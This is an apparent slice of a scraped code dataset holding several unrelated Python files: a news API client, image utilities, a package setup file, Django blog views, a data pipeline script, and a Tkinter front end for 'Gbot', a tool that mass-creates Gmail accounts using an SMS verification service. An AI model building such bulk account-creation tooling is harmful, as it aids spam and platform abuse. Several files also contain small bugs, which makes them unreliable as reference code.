Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t\t}, \n\t\t\t\t{\n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t]\n\t\"\"\"\n\tnews_api_client = NewsApiClient(api_key=news_api_key)\n\n\tresponse = news_api_client.get_top_headlines(\n\t\tsources=source_id,\n\t\tpage_size=100,\n\t\tpage=1 # This is 1-indexed\n\t)\n\n\tif response[\"status\"] != \"ok\":\n\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\tsource_id,\n\t\t\tresponse\n\t\t), exc_info=True)\n\n\t\traise Exception(\"There was an error getting sources. See log.\")\n\t\n\t# Now, we need to check if we actually got all the top articles from this one request\n\t# response will contain a 'totalResults' field, which we can use to figure out if there are more we need to get\n\n\tcurr_articles = clean_top_articles(response[\"articles\"])\n\tnum_total_articles = int(response['totalResults'])\n\tcurr_page = 2\n\twhile num_total_articles < len(curr_articles):\n\t\tresponse = news_api_client.get_top_headlines(\n\t\t\tsources=source_id,\n\t\t\tpage_size=100,\n\t\t\tpage=2 # This is 1-indexed\n\t\t)\n\n\t\tif response[\"status\"] != \"ok\":\n\t\t\tlogger.exception(\"Error getting articles for {0}. Got the following return object: {1}\".format(\n\t\t\t\tsource_id,\n\t\t\t\tresponse\n\t\t\t), exc_info=True)\n\n\t\t\traise Exception(\"There was an error getting sources. See log.\")\n\t\telse:\n\t\t\tcurr_articles.extend(clean_top_articles(response['articles']))\n\t\t\tcurr_page += 1\n\n\treturn curr_articles\n\ndef clean_top_articles(articles):\n\t\"\"\"\n\tBefore: \n\t\t[\n\t\t\t{\n\t\t\t\t'source': {\n\t\t\t\t\t'id': 'abc-news', \n\t\t\t\t\t...\n\t\t\t\t}\n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\tAfter:\n\t\t[\n\t\t\t{\n\t\t\t\t'source_id': 'abc-news', \n\t\t\t\t'author': 'John Parkinson', \n\t\t\t\t'title': \"Florida Bar looking at GOP ...\", \n\t\t\t\t'description': 'Florida Republican Rep. ...', \n\t\t\t\t'url': 'https://abcnews.go.com/Politics/florida-bar-gop-lawmakers-tweet-targeting-michael-cohen/story?id=62910364', \n\t\t\t\t'urlToImage': 'https://s.abcnews.com/images/Politics/matt-gaetz-epa-jef-190508_hpMain_16x9_992.jpg', \n\t\t\t\t'publishedAt': '2019-05-08T21:49:58Z', \n\t\t\t\t'content': 'Florida Republican Rep. Matt Gaetz is facing continued ... … [+3846 chars]'\n\t\t\t}, \n\t\t\t{\n\t\t\t\t...\n\t\t\t}\n\t\t]\n\n\t\"\"\"\n\n\tfor article in articles:\n\t\tsource_id = article['source']['id']\n\t\tdel article['source']\n\t\tarticle['source_id'] = source_id\n\t\n\treturn articles\n\n###############################\n# CONSTANTS\n###############################\n\nnews_api_categories = {\n \"business\",\n \"entertainment\",\n \"general\",\n \"health\",\n \"science\",\n \"sports\",\n \"technology\"\n}\n\nnews_api_languages = {\n \"ar\",\n \"de\",\n \"en\"\n \"es\",\n \"fr\",\n \"he\",\n \"it\",\n \"nl\",\n \"no\",\n \"pt\",\n \"ru\",\n \"se\",\n \"ud\",\n \"zh\"\n}\n\nnews_api_countries = {\n \"ae\",\n\t\"ar\",\n\t\"at\",\n\t\"au\",\n\t\"be\",\n\t\"bg\",\n\t\"br\",\n\t\"ca\",\n\t\"ch\",\n\t\"cn\",\n\t\"co\",\n\t\"cu\",\n\t\"cz\",\n\t\"de\",\n\t\"eg\",\n\t\"fr\",\n\t\"gb\",\n\t\"gr\",\n\t\"hk\",\n\t\"hu\",\n\t\"id\",\n\t\"ie\",\n\t\"il\",\n\t\"in\",\n\t\"it\",\n\t\"jp\",\n\t\"kr\",\n\t\"lt\",\n\t\"lv\",\n\t\"ma\",\n\t\"mx\",\n\t\"my\",\n\t\"ng\",\n\t\"nl\",\n\t\"no\",\n\t\"nz\",\n\t\"ph\",\n\t\"pl\",\n\t\"pt\",\n\t\"ro\",\n\t\"rs\",\n\t\"ru\",\n\t\"sa\",\n\t\"se\",\n\t\"sg\",\n\t\"si\",\n\t\"sk\",\n\t\"th\",\n\t\"tr\",\n\t\"tw\",\n\t\"ua\",\n\t\"us\",\n\t\"ve\",\n\t\"za\"\n}\n\n","sub_path":"news-worker/worker/utils/news_api.py","file_name":"news_api.py","file_ext":"py","file_size_in_byte":5345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"608262620","text":"import cbtl_base\nfrom PIL import Image\n\ndef withinRange(px1,px2,tol):\n for i in range(2):\n if px1[i]-tol <= px2[i] <= px1[i]+tol:\n return False\n return True\n\ndef imgbool(img1,img2,tolerance):\n pmer = img1.load()\n cntre = img2.load()\n origmask = Image.new(\"RGBA\",img1.size,color = (0,0,0,0))\n mask = origmask.load()\n #thru all pixels: if they are not within tolerance range, write to mask.\n for y in range(img1.height):\n for x in range(img1.width):\n if not withinRange(pmer[x,y],cntre[x,y],tolerance):\n mask[x,y] = (0,0,0,255)\n #origmask.show()\n bg = Image.new(\"RGBA\",img1.size,color = (0,0,0,255))\n return Image.composite(bg,img2,mask = origmask)\n\nif __name__ == \"__main__\":\n intro1=Image.open(\"./intro1.png\")\n intro2=Image.open(\"./intro2.png\")\n imgbool(intro1,intro2,0).show()\n imgbool(intro1,intro2,2).show()\n imgbool(intro1,intro2,5).show()\n imgbool(intro1,intro2,15).show()\n","sub_path":"cbtl_bool.py","file_name":"cbtl_bool.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"235098891","text":"import os\n\nfrom setuptools import setup, find_packages\n\nhere = os.path.abspath(os.path.dirname(__file__))\nREADME = open(os.path.join(here, 'README.rst')).read()\nCHANGES = open(os.path.join(here, 'CHANGES.txt')).read()\n\nrequires = [\n 'pyramid>=1.3a9',\n ]\nif not 'READTHEDOCS' in os.environ:\n # hail mary for readthedocs\n requires.extend(['ldappool', 'python-ldap'])\n\nsampleapp_extras = [\n 'waitress',\n 'pyramid_debugtoolbar',\n ]\ntesting_extras = ['nose', 'coverage']\ndocs_extras = ['Sphinx']\n\nsetup(name='pyramid_ldap',\n version='0.1',\n description='pyramid_ldap',\n long_description=README + '\\n\\n' + CHANGES,\n classifiers=[\n \"Programming Language :: Python\",\n \"Framework :: Pylons\",\n \"Programming Language :: Python :: 2.6\",\n \"Programming Language :: Python :: 2.7\",\n \"Topic :: System :: Systems Administration :: Authentication/Directory :: LDAP\",\n \"License :: Repoze Public License\",\n ],\n author='Chris McDonough',\n author_email='pylons-discuss@groups.google.com',\n url='http://pylonsproject.org',\n license=\"BSD-derived (http://www.repoze.org/LICENSE.txt)\",\n keywords='web pyramid pylons ldap',\n packages=find_packages(),\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n tests_require=requires,\n extras_require = {\n 'sampleapp':sampleapp_extras,\n 'docs':docs_extras,\n 'testing':testing_extras,\n },\n test_suite=\"pyramid_ldap\",\n entry_points = \"\"\"\\\n [paste.app_factory]\n sampleapp = sampleapp:main\n \"\"\",\n )\n\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"603565083","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom .models import Post\nfrom .forms import EmailPostForm\nfrom django.core.mail import send_mail\nfrom taggit.models import Tag\n\n# Create your views here.\ndef post_list(request, tag_slug=None):\n object_list=Post.published.all()\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n object_list = object_list.filter(tags__in=[tag])\n\n paginator = Paginator(object_list, 3)#3 posts in each page\n page = request.GET.get('page')\n try:\n \tposts = paginator.page(page)\n except PageNotAnInteger:\n \t#if page is not an integer deliver the first page\n \tposts = paginator.page(1)\n except EmptyPage:\n \t#if page is out of range deliver last page of results\n \tposts = paginator.page(paginator.num_pages)\n return render(request, 'blog/post/list.html', {'page':page, 'posts':posts, 'tag':tag, 'active_blog': True})\n\ndef post_detail(request, year, month, day, post):\n\tpost = get_object_or_404(Post, slug=post,\n\t\tstatus='published',\n\t\tpublish__year=year,\n\t\tpublish__month=month,\n\t\tpublish__day=day)\n\treturn render(request, 'blog/post/detail.html', {'post':post, 'active_blog': True})\n\n\ndef post_share(request, post_id):\n # Retrieve post by id\n post = get_object_or_404(Post, id=post_id, status='published')\n sent = False\n\n if request.method == 'POST':\n # Form was submitted\n form = EmailPostForm(request.POST)\n if form.is_valid():\n # Form fields passed validation\n cd = form.cleaned_data\n post_url = request.build_absolute_uri(post.get_absolute_url())\n subject = '{} ({}) recommends you reading \"{}\"'.format(cd['name'], cd['email'], post.title)\n message = 'Read \"{}\" at {}\\n\\n{}\\'s comments: {}'.format(post.title, post_url, cd['name'], cd['comments'])\n send_mail(subject, message, 'admin@myblog.com', [cd['to']])\n sent = True\n else:\n \n if request.user.is_authenticated():\n form = EmailPostForm(initial = {'email': request.user.email, 'name': request.user.get_full_name()})\n else:\n form = EmailPostForm()\n\n return render(request, 'blog/post/share.html', {'post': post,\n 'form': form,\n 'sent': sent, 'active_blog': True})","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"653368522","text":"\n# 使用python自带的函数heapq完成堆排序\n\nimport heapq\nimport random\n\nli = list(range(100))\nrandom.shuffle(li)\nprint(li)\n\nheapq.heapify(li) # 建堆(小根堆)\nprint(li)\n\nn = len(li)\nfor i in range(n):\n print(heapq.heappop(li),end=\",\")","sub_path":"排序方法/python堆排序.py","file_name":"python堆排序.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"476915279","text":"import os\nimport sys\nfrom os import listdir\nfrom os.path import isfile, join\nimport threading\nimport datetime\nimport configparser\nimport tkinter as tk\nfrom tkinter.scrolledtext import ScrolledText\nfrom tkinter.ttk import Notebook\nfrom tkinter import messagebox\nfrom selenium.common.exceptions import WebDriverException\n\nimport helper\nfrom gbot import Gbot\n\nclass Facade(tk.Tk):\n\tdef __init__(self):\n\t\tsuper().__init__()\n\n\t\tself.title('Gbot')\n\t\tself.geometry('600x600')\n\t\tself.head_font = ('Verdana', 12)\n\t\tself.gbot = None\t\n\t\tself.config = configparser.ConfigParser()\n\t\tself.configfile = helper.resource_path('config.ini')\n\t\tself.accounts_dir = helper.resource_path('results')\n\t\tself.namesfile = helper.resource_path('names.txt')\n\n\t\tself.current_date = datetime.datetime.now()\n\t\tself.current_date = self.current_date.strftime(\"%Y-%m-%d\")\n\t\t\n\t\ttab_control = Notebook(self)\n\t\tself.main(tab_control)\n\t\tself.accounts(tab_control)\n\t\tself.names(tab_control)\n\t\tself.configs(tab_control)\n\n\tdef main(self, tab_control):\n\t\tmain_tab = tk.Frame(tab_control)\n\t\ttab_control.add(main_tab, text='Главная')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n \n\t\tyes_sign = tk.PhotoImage(file=helper.resource_path('img/yes_sign.png'))\n\n\t\tself.accounts_amount = tk.IntVar()\n\t\tself.accounts_amount.set(10)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Лог:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.log_list_field = ScrolledText(main_tab, height=20)\n\t\tself.log_list_field.pack(fill=tk.X, padx=5)\n\n\t\ttk.Label(main_tab, font=self.head_font, text='Сколько аккаунтов создать:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(40, 0), padx=(5, 0))\n\t\taccounts_amount_field = tk.Entry(main_tab, textvariable=self.accounts_amount, width=30)\n\t\taccounts_amount_field.pack(side=tk.TOP, anchor=tk.NW, padx=(5, 0))\n\n\t\tself.start_btn = tk.Button(main_tab, text='Начать', command=self.on_start, width=30, height=2)\n\t\tself.start_btn.pack(side=tk.LEFT, anchor=tk.NW, pady=(30, 0), padx=(5, 0))\n\n\t\tstop_btn = tk.Button(main_tab, text='Стоп', command=self.on_stop, width=30, height=2)\n\t\tstop_btn.pack(side=tk.RIGHT, anchor=tk.NW, pady=(30, 0), padx=(0, 5))\n\n\tdef accounts(self, tab_control):\n\t\taccounts_tab = tk.Frame(tab_control)\n\t\ttab_control.add(accounts_tab, text='Аккаунты')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(accounts_tab, font=self.head_font, text='Созданные аккаунты gmail:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.accounts_list_field = ScrolledText(accounts_tab)\n\t\tself.accounts_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tcopy_btn = tk.Button(accounts_tab, text='Скопировать все', command=self.on_copy_accounts)\n\t\tcopy_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tcopy_today_btn = tk.Button(accounts_tab, text='Скопировать сегодняшние', command=self.on_copy_today_accounts)\n\t\tcopy_today_btn.pack(side=tk.LEFT, padx=(5, 0), pady=(0, 10))\n\n\t\tclear_btn = tk.Button(accounts_tab, text='Очистить все', command=self.on_clear_accounts)\n\t\tclear_btn.pack(side=tk.RIGHT, padx=(0, 5), pady=(0, 10))\n\t\t\n\t\tself.accounts_file = open(join(self.accounts_dir, self.current_date + '.txt'), 'a+')\n\n\t\tself.accounts_list = []\n\n\t\tfor file in listdir(self.accounts_dir):\n\t\t\tif isfile(join(self.accounts_dir, file)):\n\t\t\t\t_, file_ext = os.path.splitext(file)\n\t\t\t\tif file_ext == '.txt':\n\t\t\t\t\tself.accounts_list.append(join(self.accounts_dir, file))\n\n\t\tself.accounts_list.sort(key=lambda x: x.split('-'), reverse=True)\n\n\t\tfor file in self.accounts_list:\n\t\t\taccounts = open(file, 'r')\n\t\t\tfile_name, _ = os.path.splitext(file)\n\t\t\tfile_name_chunks = file_name.split(os.sep)\n\t\t\tfile_name = file_name_chunks[-1]\n\t\t\tfor account in accounts:\n\t\t\t\tself.accounts_list_field.insert(tk.END, file_name + ' | ' + account)\n\n\tdef names(self, tab_control):\n\t\tnames_tab = tk.Frame(tab_control)\n\t\ttab_control.add(names_tab, text='Имена')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\ttk.Label(names_tab, font=self.head_font, text='Имена:')\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.NW, pady=(20, 0), padx=(5, 0))\n\t\tself.names_list_field = ScrolledText(names_tab)\n\t\tself.names_list_field.pack(expand=True, fill=tk.BOTH, pady=(0, 20), padx=5)\n\n\t\tnames = open(self.namesfile, 'r')\n\n\t\tfor name in names:\n\t\t\tself.names_list_field.insert(tk.END, name)\n\n\t\tsave_btn = tk.Button(names_tab, text='Сохранить', command=self.on_save_names, width=30, height=2)\n\t\tsave_btn.pack(side=tk.BOTTOM, anchor=tk.NE, padx=(0, 5), pady=(30, 10))\n\n\tdef configs(self, tab_control):\n\t\tconfigs_tab = tk.Frame(tab_control)\n\t\ttab_control.add(configs_tab, text='Настройки')\n\t\ttab_control.pack(expand=True, fill=tk.BOTH)\n\n\t\tself.config.read(self.configfile)\n\t\tself.api_key = tk.StringVar()\n\t\tself.wait_code_time = tk.IntVar()\n\t\tself.request_for_code_time = tk.IntVar()\n\t\tself.backup_email = tk.StringVar()\n\t\tself.wait_element_time = tk.IntVar()\n\t\tself.wait_page_reload_time = tk.IntVar()\n\n\t\tself.api_key.set(self.config['api']['api_key'])\n\t\tself.wait_code_time.set(self.config['api']['wait_code_time'])\n\t\tself.request_for_code_time.set(self.config['api']['request_for_code_time'])\n\t\tself.backup_email.set(self.config['user_data']['backup_email'])\n\t\tself.wait_element_time.set(self.config['app']['wait_element_time'])\n\t\tself.wait_page_reload_time.set(self.config['app']['wait_page_reload_time'])\n\n\t\tfields = [\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Api ключ'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.api_key, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания смс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед запросом\\nсмс кода'), \n\t\t\t\ttk.Entry(configs_tab, textvariable=self.request_for_code_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Email адресс для восстановления'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.backup_email, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания появления\\n элемента'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_element_time, width=35)\n\t\t\t],\n\t\t\t[\n\t\t\t\ttk.Label(configs_tab, text='Время ожидания перед\\n перезагрузкой страницы'),\n\t\t\t\ttk.Entry(configs_tab, textvariable=self.wait_page_reload_time, width=35)\n\t\t\t]\n\t\t]\n\n\t\ti = 0\n\t\tfor field in fields:\n\t\t\tfield[0].grid(row=i, column=0, padx=5, pady=15)\n\t\t\tfield[1].grid(row=i, column=1, padx=5, pady=15)\n\t\t\ti += 1\n\n\t\tsave_btn = tk.Button(configs_tab, text='Сохранить', command=self.on_save_accounts, width=30, height=2)\n\t\tsave_btn.place(relx=0.991, rely=0.982, anchor=tk.SE)\n\n\tdef on_save_accounts(self):\n\t\tself.config['api'] = {\n\t\t\t'api_key': self.api_key.get(),\n\t\t\t'wait_code_time': self.wait_code_time.get(),\n\t\t\t'request_for_code_time': self.request_for_code_time.get()\n\t\t}\n\n\t\tself.config['user_data'] = {\n\t\t\t'backup_email': self.backup_email.get()\n\t\t}\n\n\t\tself.config['app'] = {\n\t\t\t'wait_element_time': self.wait_element_time.get(),\n\t\t\t'wait_page_reload_time': self.wait_page_reload_time.get()\n\t\t}\n\n\t\twith open(self.configfile, 'w+') as configfile:\n\t\t\tself.config.write(configfile)\n\t\t\tself.dialog('Уведомление', 'Настройки были успешно сохранены.')\n\n\tdef on_copy_accounts(self):\n\t\tself.clipboard_append(self.accounts_list_field.get('1.0', tk.END))\n\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef on_copy_today_accounts(self):\n\t\taccounts_list = self.accounts_list_field.get('1.0', tk.END).split('\\n')\n\t\tcurrent_accounts_list = []\n\n\t\tfor account in accounts_list:\n\t\t\taccount_chunks = account.split(' | ')\n\t\t\tif account_chunks[0] == self.current_date:\n\t\t\t\tcurrent_accounts_list.append(' | '.join(account_chunks))\n\n\t\tcurrent_accounts_list = '\\n'.join(current_accounts_list)\n\n\t\tif not current_accounts_list:\n\t\t\tself.dialog('Уведомление', 'Вы не создали ни один аккаунт сегодня.')\n\t\telse:\n\t\t\tself.clipboard_append(current_accounts_list)\n\t\t\tself.dialog('Уведомление', 'Аккаунты были скопированы.\\nCTRL + V чтобы вставить.')\n\n\tdef dialog(self, title, message):\n\t\twindow = tk.Toplevel(menu='sdf')\n\t\twindow.geometry('%dx%d+%d+%d' % (300, 150, \n\t\t\tself.winfo_x() + (self.winfo_width() / 4), \n\t\t\tself.winfo_y() + (self.winfo_height() / 4))\n\t\t)\n\t\twindow.title(title)\n\t\ttk.Message(window, text=message, font=('Verdana', 15), width=300)\\\n\t\t\t.pack(side=tk.TOP, anchor=tk.CENTER, pady=5)\n\t\ttk.Button(window, text='OK', width=20, command=lambda: window.destroy())\\\n\t\t\t.pack(side=tk.BOTTOM, anchor=tk.CENTER, pady=(0, 10))\n\n\t\twindow.after(3000, lambda: window.destroy())\n\t\treturn window\n\n\tdef on_clear_accounts(self):\n\t\tfor account in self.accounts_list:\n\t\t\tself.accounts_list_field.delete('1.0', tk.END)\n\t\t\tself.dialog('Уведомление', 'Аккаунты удалены.')\n\t\t\tos.remove(account)\n\n\tdef on_save_names(self):\n\t\tnames_list = self.names_list_field.get('1.0', tk.END).split('\\n')\n\t\tnames_list = list(filter(None, names_list))\n\t\tnames_list = [name.strip() for name in names_list]\n\t\tnames_list = '\\n'.join(names_list)\n\n\t\tnames = open(self.namesfile, 'w+')\n\t\tnames.write(names_list)\n\t\tnames.close()\n\t\tself.dialog('Уведомление', 'Имена были успешно сохранены.')\n\n\tdef on_start(self):\n\t\tthreading.Thread(target=self.gbot_start).start()\n\n\tdef on_stop(self):\n\t\tif self.gbot != None:\n\t\t\tself.gbot.destroy()\n\n\t\tself.start_btn.configure(state='normal')\n\n\tdef gbot_start(self):\n\t\ttry:\n\t\t\tself.start_btn.configure(state='disabled')\n\t\t\tself.gbot = Gbot(\n\t\t\t\tlambda message: self.logger(message),\n\t\t\t\tlambda account: self.add_account(account)\n\t\t\t)\n\t\t\tself.gbot.prepare()\n\t\t\tself.gbot.launch(self.accounts_amount.get())\n\t\texcept WebDriverException:\n\t\t\tself.start_btn.configure(state='normal')\n\n\tdef logger(self, message):\n\t\tself.log_list_field.insert(tk.END, message + '\\n')\n\t\tself.log_list_field.see(tk.END)\n\n\tdef add_account(self, account):\n\t\tself.accounts_file.write(account + '\\n')\n\t\tself.accounts_list_field.insert(tk.END, account + '\\n')\n\t\tself.accounts_list_field.see(tk.END)\n\nif __name__ == '__main__':\n\tfacade = Facade()\n\tfacade.mainloop()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"196952285","text":"import os, random\nimport io\nimport numpy as np\nfrom PIL import Image\n\n\nclass BlackBox():\n\n def __init__(self,shredded_path,orig_path):\n self.shredded_image=Image.open(shredded_path)\n self.original_image=Image.open(orig_path)\n self.blocks=self.create_blocks()\n\n def PIL2array(self,img):\n return np.array(img.getdata(),\n np.uint8).reshape(img.size[1], img.size[0],1)\n\n def array2PIL(self,arr, size):\n mode = 'L'\n arr = arr.reshape(arr.shape[0]*arr.shape[1], arr.shape[2])\n if len(arr[0]) == 3:\n arr = np.c_[arr, 255*np.ones((len(arr),1), np.uint8)]\n return Image.frombuffer(mode, size, arr.tostring(), 'raw', mode, 0, 1)\n\n\n\n def create_blocks(self): \n blocks=[] \n for i in range(1,129): \n blocks.append(list(range((i-1)*5,i*5))) \n return blocks \n\n\n def swap(self,indexes,matrix):\n permutation=[]\n for i in indexes:\n permutation.extend(self.blocks[i])\n return matrix[:,permutation]\n\n def evaluate_solution(self,permutation):\n if len(permutation) != len(self.blocks):\n raise Exception(\"Size of permutation list is wrong. It should be {0}\".format(len(self.blocks)))\n \n origin_matrix=self.PIL2array(self.original_image)\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n return np.sum(np.abs(np_matrix-origin_matrix))\n\n\n def show_solution(self,permutation, record=None):\n if not isinstance(permutation,list):\n raise Exception(\"You should provide a permutation list\")\n np_matrix=self.PIL2array(self.shredded_image)\n np_matrix=self.swap(permutation,np_matrix)\n new_image=self.array2PIL(np_matrix,self.original_image.size)\n if record is None:\n new_image.show()\n else:\n new_image.save(record)\n \n\n\n\n","sub_path":"blackbox.py","file_name":"blackbox.py","file_ext":"py","file_size_in_byte":2214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"386089093","text":"import argparse\n\nfrom core_data_modules.logging import Logger\nfrom core_data_modules.traced_data.io import TracedDataJsonIO\nfrom core_data_modules.util import IOUtils\n\nfrom src import LoadData, TranslateRapidProKeys, AutoCode, ProductionFile, \\\n ApplyManualCodes, AnalysisFile, WSCorrection\nfrom src.lib import PipelineConfiguration, MessageFilters\n\nlog = Logger(__name__)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Runs the post-fetch phase of the pipeline\")\n\n parser.add_argument(\"user\", help=\"User launching this program\")\n parser.add_argument(\"pipeline_run_mode\", help=\"whether to generate analysis files or not\",\n choices=[\"all-stages\", \"auto-code-only\"])\n parser.add_argument(\"pipeline_configuration_file_path\", metavar=\"pipeline-configuration-file\",\n help=\"Path to the pipeline configuration json file\")\n\n parser.add_argument(\"raw_data_dir\", metavar=\"raw-data-dir\",\n help=\"Path to a directory containing the raw data files exported by fetch_raw_data.py\")\n parser.add_argument(\"prev_coded_dir_path\", metavar=\"prev-coded-dir-path\",\n help=\"Directory containing Coda files generated by a previous run of this pipeline. \"\n \"New data will be appended to these files.\")\n\n parser.add_argument(\"auto_coding_json_output_path\", metavar=\"auto-coding-json-output-path\",\n help=\"Path to a JSON file to write the TracedData associated with auto-coding stage of the pipeline\")\n parser.add_argument(\"messages_json_output_path\", metavar=\"messages-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the messages analysis file\")\n parser.add_argument(\"individuals_json_output_path\", metavar=\"individuals-json-output-path\",\n help=\"Path to a JSONL file to write the TracedData associated with the individuals analysis file\")\n parser.add_argument(\"icr_output_dir\", metavar=\"icr-output-dir\",\n help=\"Directory to write CSV files to, each containing 200 messages and message ids for use \" \n \"in inter-code reliability evaluation\"),\n parser.add_argument(\"coded_dir_path\", metavar=\"coded-dir-path\",\n help=\"Directory to write coded Coda files to\")\n parser.add_argument(\"csv_by_message_output_path\", metavar=\"csv-by-message-output-path\",\n help=\"Analysis dataset where messages are the unit for analysis (i.e. one message per row)\")\n parser.add_argument(\"csv_by_individual_output_path\", metavar=\"csv-by-individual-output-path\",\n help=\"Analysis dataset where respondents are the unit for analysis (i.e. one respondent \"\n \"per row, with all their messages joined into a single cell)\")\n parser.add_argument(\"production_csv_output_path\", metavar=\"production-csv-output-path\",\n help=\"Path to a CSV file to write raw message and demographic responses to, for use in \"\n \"radio show production\"),\n\n args = parser.parse_args()\n\n pipeline_run_mode = args.pipeline_run_mode\n user = args.user\n pipeline_configuration_file_path = args.pipeline_configuration_file_path\n\n raw_data_dir = args.raw_data_dir\n prev_coded_dir_path = args.prev_coded_dir_path\n\n auto_coding_json_output_path = args.auto_coding_json_output_path\n messages_json_output_path = args.messages_json_output_path\n individuals_json_output_path = args.individuals_json_output_path\n icr_output_dir = args.icr_output_dir\n coded_dir_path = args.coded_dir_path\n csv_by_message_output_path = args.csv_by_message_output_path\n csv_by_individual_output_path = args.csv_by_individual_output_path\n production_csv_output_path = args.production_csv_output_path\n\n # Load the pipeline configuration file\n log.info(\"Loading Pipeline Configuration File...\")\n with open(pipeline_configuration_file_path) as f:\n pipeline_configuration = PipelineConfiguration.from_configuration_file(f)\n Logger.set_project_name(pipeline_configuration.pipeline_name)\n log.debug(f\"Pipeline name is {pipeline_configuration.pipeline_name}\")\n\n log.info(\"Loading the raw data...\")\n data = LoadData.load_raw_data(user, raw_data_dir, pipeline_configuration)\n\n log.info(\"Translating Rapid Pro Keys...\")\n data = TranslateRapidProKeys.translate_rapid_pro_keys(user, data, pipeline_configuration)\n\n if pipeline_configuration.move_ws_messages:\n log.info(\"Pre-filtering empty message objects...\")\n # This is a performance optimisation to save execution time + memory when moving WS messages, by removing\n # the need to mark and process a high volume of empty message objects as 'NR' in WS correction.\n # Empty message objects represent flow runs where the participants never sent a message e.g. from an advert\n # flow run where we asked someone a question but didn't receive a response.\n data = MessageFilters.filter_empty_messages(data,\n [plan.raw_field for plan in PipelineConfiguration.RQA_CODING_PLANS])\n\n log.info(\"Moving WS messages...\")\n data = WSCorrection.move_wrong_scheme_messages(user, data, prev_coded_dir_path)\n else:\n log.info(\"Not moving WS messages (because the 'MoveWSMessages' key in the pipeline configuration \"\n \"json was set to 'false')\")\n\n log.info(\"Auto Coding...\")\n data = AutoCode.auto_code(user, data, pipeline_configuration, icr_output_dir, coded_dir_path)\n\n log.info(\"Exporting production CSV...\")\n data = ProductionFile.generate(data, production_csv_output_path)\n\n if pipeline_run_mode == \"all-stages\":\n log.info(\"Running post labelling pipeline stages...\")\n\n log.info(\"Applying Manual Codes from Coda...\")\n data = ApplyManualCodes.apply_manual_codes(user, data, prev_coded_dir_path)\n\n log.info(\"Generating CSVs for Analysis...\")\n messages_data, individuals_data = AnalysisFile.generate(user, data, csv_by_message_output_path,\n csv_by_individual_output_path)\n\n log.info(\"Writing messages TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(messages_json_output_path)\n with open(messages_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(messages_data, f)\n\n log.info(\"Writing individuals TracedData to file...\")\n IOUtils.ensure_dirs_exist_for_file(individuals_json_output_path)\n with open(individuals_json_output_path, \"w\") as f:\n TracedDataJsonIO.export_traced_data_iterable_to_jsonl(individuals_data, f)\n else:\n assert pipeline_run_mode == \"auto-code-only\", \"pipeline run mode must be either auto-code-only or all-stages\"\n log.info(\"Writing 